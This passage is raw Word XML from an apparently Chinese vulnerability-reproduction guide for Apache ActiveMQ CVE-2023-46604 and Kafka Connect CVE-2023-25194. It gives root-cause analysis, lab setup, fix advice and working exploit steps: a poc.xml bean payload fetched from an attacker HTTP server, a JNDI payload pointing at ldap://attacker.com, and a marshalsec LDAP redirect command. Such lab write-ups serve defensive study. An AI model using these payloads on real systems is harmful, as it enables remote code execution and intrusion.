        <w:t xml:space="preserve">        &lt;value&gt;touch /tmp/activeMQ-RCE-success&lt;/value&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">      &lt;/list&gt;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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;/constructor-arg&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/bean&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>&lt;/beans&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C1A48" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>当ClassPathXmlApplicationContext被实例化时，它会从message指定的URL下载poc.xml并加载Bean，ProcessBuilder的start()方法随之被调用，命令执行完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD8F759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（5）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2095FE35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该漏洞的本质是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OpenWire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>协议反序列化过程中对异常类</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名缺乏白</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>名单校验。</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>createThrowable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()方法信任网络传入的类名字符串，直接通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Class.forName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()加载并反射实例化，属于典型的"不安全反射"漏洞。与传统Java反序列化漏洞不同，该漏洞不依赖</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>readObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()，而是通过构造器注入实现利用，因此绕过了很多反序列化防护手段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545E7E2" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55DD9E85" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Vulhub ActiveMQ CVE-2023-46604环境，Web控制台端口8161，OpenWire端口61616</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321730DB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装Python3、HTTP服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA018C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5.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA3659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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：启动HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>反连服务器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4E63A9AE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在攻击机上准备poc.xml（内容如上），并启动HTTP服务器：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60715EA3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 xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6666</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78488421" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤二：执行PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101DBEE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>运行poc.py，向目标61616端口发送构造好的OpenWire ExceptionResponse数据包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5EE958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python3 poc.py 192.168.1.100 61616 http://192.168.1.200:6666/poc.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472A8B11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步骤三：验证命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4625EA8F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进入ActiveMQ容器，检查/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录下是否生成了成功标记文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4528E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docker exec cve-2023-46604-activemq-1 ls -l /tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t># 预期输出包含 activeMQ-RCE-success 文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFECED" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.6 </w:t>
      </w:r>
      <w:r>
        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363103AF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:t>① 升级至Apache ActiveMQ 5.15.16 / 5.16.7 / 5.17.6 / 5.18.3及以上版本。官方在补丁中对createThrowable()方法增加了类名白名单校验，仅允许实例化java.lang包下的标准异常类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11672446" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>② 在网络层面限制61616端口的访问来源，仅允许可信的消息生产者和消费者连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE740C9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>③ 为ActiveMQ启用身份认证与授权机制，避免匿名访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>OpenWire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAD3112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25402F0C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第六章</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  Apache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Kafka JNDI</w:t>
      </w:r>
      <w:r>
        <w:t>注入漏洞（</w:t>
      </w:r>
      <w:r>
        <w:t>CVE-2023-25194</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5998FB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6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EA2CF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Apache Kafka是Apache基金会旗下的分布式事件流平台，广泛应用于日志收集、实时数据管道与</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>流处理</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>场景。Kafka Connect是Kafka的集成工具，用于通过REST API配置和管理数据源连接器（Source Connector）与数据汇连接器（Sink Connector）。在Kafka 2.4.0至3.2.2版本中，当使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Debezium</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>等连接器时，攻击者可通过Kafka Connect REST API配置恶意的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sasl.jaas.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>属性，触发</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JndiLoginModule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的JNDI查找，结合LDAP反序列化实现远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8BFEE" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>影响版本</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4177FA68" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>2.4.0 &lt;= Apache Kafka &lt;= 3.2.2（需启用Kafka Connect且使用Debezium等支持database.history.producer配置的连接器）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE45AB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 </w:t>
      </w:r>
      <w:r>
        <w:t>代码级成因剖析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E537B74" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（1）Kafka Connect REST API配置入口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B3CBCF" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Kafka Connect提供了REST API（默认端口8083）用于管理连接器。通过POST /connectors接口，用户可以创建新的连接器并传入配置参数。这些配置参数最终会被传递给连接器的Java客户端，用于建立与外部系统（如MySQL）的连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339EA6A8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POST /connectors HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Host: kafka-connect:8083</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/json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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "name": "mysql-connect",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    "config": {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "connector.class": "io.debezium.connector.mysql.MySqlConnector",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.hostname": "192.168.1.100",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.port": "3306",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.user": "root",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.password": "root",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.history.kafka.bootstrap.servers": "kafka:9092",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.history.kafka.topic": "schema-changes",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.history.producer.security.protocol": "SASL_SSL",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.history.producer.sasl.mechanism": "PLAIN",</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        "database.history.producer.sasl.jaas.config": "..."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686C486E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（2）sasl.jaas.config与JndiLoginModule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D239627" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>sasl.jaas.config是Kafka客户端用于配置SASL认证的属性，其值是一个JAAS（Java Authentication and Authorization Service）配置字符串，指定使用的LoginModule实现类及其参数。攻击者可以将该属性设置为使用</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>com.sun.security.auth.module.JndiLoginModule，并通过user.provider.url参数指定恶意LDAP服务器地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7944291C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"database.history.producer.sasl.jaas.config":</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "com.sun.security.auth.module.JndiLoginModule required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   user.provider.url=\"ldap://attacker.com:1389/rce\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   useFirstPass=\"true\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   serviceName=\"x\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   debug=\"true\"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   group.provider.url=\"xxx\";"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EA1A4C" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>当Kafka Connect的连接器初始化时，会创建一个Kafka Producer用于写入数据库历史记录。该Producer根据sasl.jaas.config的配置实例化JndiLoginModule，并在登录过程中调用user.provider.url指定的LDAP地址进行JNDI查找。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFFAAA8" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（3）JNDI注入与LDAP反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7442A8B9" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>JndiLoginModule在登录时会执行InitialContext.lookup(user.provider.url)，向攻击者控制的LDAP服务器发起查询。攻击者的LDAP服务器返回一个包含恶意序列化对象的响应，Kafka端在反序列化该对象时，如果类路径上存在可用的Gadget链（如CommonsBeanutils、CommonsCollections等），即可触发命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4FBC2A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JndiLoginModule.login() 中的关键逻辑（简化示意）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public boolean login() throws LoginException {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    if (userProviderURL != null) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        ctx = new InitialContext();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 向攻击者控制的LDAP服务器发起JNDI查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Result res = ctx.search(userProviderURL, "..." );</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 获取返回的属性值并反序列化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        Attributes attrs = res.getAttributes();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        // 反序列化恶意对象，触发Gadget链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59F273F1" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>在实际利用中，通常使用marshalsec工具启动LDAP引用服务器，将请求重定向到包含恶意类的HTTP服务器，或直接返回序列化的Gadget对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4556D8D7" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>（4）漏洞根因总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC98659" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>该漏洞的根因在于Kafka Connect REST API允许用户配置sasl.jaas.config属性，而该属性可以指定任意LoginModule实现类。JndiLoginModule的设计本身支持通过JNDI进行用户认证，但当JNDI地址可被攻击者控制时，就演变为JNDI注入漏洞。结合Kafka Connect类路径上常见的依赖库（如Debezium自带的CommonsBeanutils），攻击者可以构建完整的RCE利用链。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6133E0CB" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">6.4 </w:t>
      </w:r>
      <w:r>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E43AB22" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>靶机：Kafka Connect 3.2.2 + Debezium MySQL Connector，REST API端口8083</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508F399" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>攻击机：Kali Linux，安装JDK 8+、marshalsec、Python HTTP服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6375E98E" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.5 </w:t>
      </w:r>
      <w:r>
        <w:t>漏洞复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8DD689" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b/>
        </w:rPr>
        <w:t>步骤一：启动恶意LDAP服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056C1978" w14:textId="77777777" w:rsidR="00DD3943" w:rsidRDefault="001369D1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>使用marshalsec启动LDAP引用服务器，将请求重定向到恶意类的HTTP地址：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F19BFF3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java -cp marshalsec-0.0.3-SNAPSHOT-all.jar \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  marshalsec.jndi.LDAPRefServer http://192.168.1.200:8888/#Calc 1389</w:t>
